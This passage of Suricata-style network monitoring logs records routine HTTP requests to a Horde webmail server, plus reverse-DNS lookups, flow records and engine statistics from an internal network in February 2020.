Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3661},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18961,"tx_id":1}} {"timestamp":"2020-02-29T00:04:29.495288+0000","flow_id":1612243390009016,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57135,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":30120,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:29.600386+0000","flow_id":1612243390009016,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57135,"proto":"UDP","dns":{"type":"answer","id":30120,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:29.600386+0000","flow_id":1612243390009016,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57135,"proto":"UDP","dns":{"type":"answer","id":30120,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:29.722668+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5170}} 
{"timestamp":"2020-02-29T00:04:32.103218+0000","flow_id":1403928886416178,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46632,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39270,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:32.211965+0000","flow_id":1403928886416178,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46632,"proto":"UDP","dns":{"type":"answer","id":39270,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:32.211965+0000","flow_id":1403928886416178,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46632,"proto":"UDP","dns":{"type":"answer","id":39270,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:32.263616+0000","flow_id":1694633747830855,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20}} {"timestamp":"2020-02-29T00:04:32.263616+0000","flow_id":1694633747830855,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/turba\/delete.php","state":"CLOSED","stored":false,"size":77,"tx_id":0}} {"timestamp":"2020-02-29T00:04:32.278299+0000","flow_id":1188136844541723,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47715,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64802,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:32.386792+0000","flow_id":1188136844541723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47715,"proto":"UDP","dns":{"type":"answer","id":64802,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:32.386792+0000","flow_id":1188136844541723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47715,"proto":"UDP","dns":{"type":"answer","id":64802,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:32.455299+0000","flow_id":1694633747830855,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4067}} 
{"timestamp":"2020-02-29T00:04:33.000372+0000","event_type":"stats","stats":{"uptime":13925,"capture":{"kernel_packets":133240,"kernel_drops":0},"decoder":{"pkts":133250,"bytes":92298822,"invalid":181,"ipv4":131811,"ipv6":8,"ethernet":133250,"raw":0,"null":0,"sll":0,"tcp":126746,"udp":4870,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2693,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2709,"synack":2700,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1736,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2220,"failed_udp":109},"tx":{"http":4510,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2297}},"flow_mgr":{"closed_pruned":2672,"new_pruned":15,"est_pruned":2258,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24137,"memcap_state":0,"memcap_global":0},"http":{"memuse":104482,"memcap":0}}} 
{"timestamp":"2020-02-29T00:04:34.727684+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34730,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5170},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21414,"tx_id":2}} {"timestamp":"2020-02-29T00:04:37.456381+0000","flow_id":1694633747830855,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34732,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4067},"app_proto":"http","fileinfo":{"filename":"\/turba\/search.php","state":"CLOSED","stored":false,"size":19290,"tx_id":1}} 
{"timestamp":"2020-02-29T00:04:38.001135+0000","flow_id":686372991301585,"event_type":"flow","src_ip":"192.168.10.130","src_port":34720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1393,"bytes_toclient":6242,"start":"2020-02-29T00:03:32.227281+0000","end":"2020-02-29T00:03:37.538580+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:40.000262+0000","event_type":"stats","stats":{"uptime":13932,"capture":{"kernel_packets":133273,"kernel_drops":0},"decoder":{"pkts":133276,"bytes":92306829,"invalid":181,"ipv4":131835,"ipv6":8,"ethernet":133276,"raw":0,"null":0,"sll":0,"tcp":126766,"udp":4874,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099648},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2694,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2710,"synack":2701,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1737,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2222,"failed_udp":109},"tx":{"http":4512,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2299}},"flow_mgr":{"closed_pruned":2673,"new_pruned":15,"est_pruned":2258,"bypass
ed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24137,"memcap_state":0,"memcap_global":0},"http":{"memuse":35710,"memcap":0}}} {"timestamp":"2020-02-29T00:04:40.321905+0000","flow_id":384277881088369,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53660,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":27442,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:40.431524+0000","flow_id":384277881088369,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53660,"proto":"UDP","dns":{"type":"answer","id":27442,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:40.431524+0000","flow_id":384277881088369,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53660,"proto":"UDP","dns":{"type":"answer","id":27442,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:40.588219+0000","flow_id":2068106924568790,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} 
{"timestamp":"2020-02-29T00:04:40.610884+0000","flow_id":2068106924568790,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5270}} {"timestamp":"2020-02-29T00:04:45.616045+0000","flow_id":2068106924568790,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5270},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21568,"tx_id":0}} 
{"timestamp":"2020-02-29T00:04:47.000164+0000","event_type":"stats","stats":{"uptime":13939,"capture":{"kernel_packets":133281,"kernel_drops":0},"decoder":{"pkts":133294,"bytes":92314686,"invalid":181,"ipv4":131853,"ipv6":8,"ethernet":133294,"raw":0,"null":0,"sll":0,"tcp":126782,"udp":4876,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7100224},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2695,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2711,"synack":2702,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1738,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2223,"failed_udp":109},"tx":{"http":4513,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2300}},"flow_mgr":{"closed_pruned":2673,"new_pruned":15,"est_pruned":2258,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":24468,"memcap_state":0,"memcap_global":0},"http":{"memuse":40042,"memcap":0}}} 
{"timestamp":"2020-02-29T00:04:48.000452+0000","flow_id":1881129799098872,"event_type":"flow","src_ip":"192.168.10.122","src_port":42778,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-28T23:59:47.369144+0000","end":"2020-02-28T23:59:47.734840+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:48.000632+0000","flow_id":623224072413106,"event_type":"flow","src_ip":"192.168.10.122","src_port":37719,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-28T23:59:47.106418+0000","end":"2020-02-28T23:59:47.331703+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:48.000678+0000","flow_id":2193489897440047,"event_type":"flow","src_ip":"192.168.10.130","src_port":34712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":1276,"bytes_toclient":956,"start":"2020-02-29T00:02:47.377647+0000","end":"2020-02-29T00:03:47.408351+0000","age":60,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:04:48.000945+0000","flow_id":240989174631820,"event_type":"flow","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":22,"pkts_toclient":28,"bytes_toserver":3514,"bytes_toclient":28564,"start":"2020-02-29T00:02:46.724364+0000","end":"2020-02-29T00:03:47.408388+0000","age":61,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:50.047903+0000","flow_id":1140587262819103,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54066,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32155,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:50.157141+0000","flow_id":1140587262819103,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54066,"proto":"UDP","dns":{"type":"answer","id":32155,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:50.157141+0000","flow_id":1140587262819103,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54066,"proto":"UDP","dns":{"type":"answer","id":32155,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:50.308555+0000","flow_id":509385984074491,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:04:50.329994+0000","flow_id":509385984074491,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5266}} {"timestamp":"2020-02-29T00:04:53.000550+0000","flow_id":374678625694270,"event_type":"flow","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":16,"pkts_toclient":19,"bytes_toserver":3294,"bytes_toclient":16546,"start":"2020-02-29T00:03:47.569918+0000","end":"2020-02-29T00:03:52.855546+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:04:53.000773+0000","flow_id":1505212802246177,"event_type":"flow","src_ip":"192.168.10.81","src_port":52674,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":2,"bytes_toserver":272,"bytes_toclient":140,"start":"2020-02-29T00:03:47.828961+0000","end":"2020-02-29T00:03:52.835319+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:54.000206+0000","event_type":"stats","stats":{"uptime":13946,"capture":{"kernel_packets":133299,"kernel_drops":0},"decoder":{"pkts":133314,"bytes":92322649,"invalid":181,"ipv4":131873,"ipv6":8,"ethernet":133314,"raw":0,"null":0,"sll":0,"tcp":126800,"udp":4878,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099648},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2696,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2712,"synack":2703,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1739,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2224,"failed_udp":109},"tx":{"http":4514,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2301}},"flow_mgr":{"closed_pruned":2675,"new_pruned":15,"est_pruned":2260,"bypassed_pruned":0,"flows_checked":2,"
flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24139,"memcap_state":0,"memcap_global":0},"http":{"memuse":56764,"memcap":0}}} {"timestamp":"2020-02-29T00:04:55.334911+0000","flow_id":509385984074491,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5266},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21568,"tx_id":0}} {"timestamp":"2020-02-29T00:04:56.000454+0000","flow_id":1166765069131310,"event_type":"flow","src_ip":"192.168.10.122","src_port":33141,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:59:55.351790+0000","end":"2020-02-28T23:59:55.457599+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:57.000258+0000","flow_id":289883071232958,"event_type":"flow","src_ip":"192.168.10.122","src_port":59034,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:56.375742+0000","end":"2020-02-28T23:59:56.487105+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:04:59.000659+0000","flow_id":1802819661102183,"event_type":"flow","src_ip":"192.168.10.122","src_port":33902,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:59:58.359527+0000","end":"2020-02-28T23:59:58.464835+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:59.384895+0000","flow_id":2220367811436415,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38736,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23764,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:59.493660+0000","flow_id":2220367811436415,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38736,"proto":"UDP","dns":{"type":"answer","id":23764,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:59.493660+0000","flow_id":2220367811436415,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38736,"proto":"UDP","dns":{"type":"answer","id":23764,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:59.622045+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7683}} 
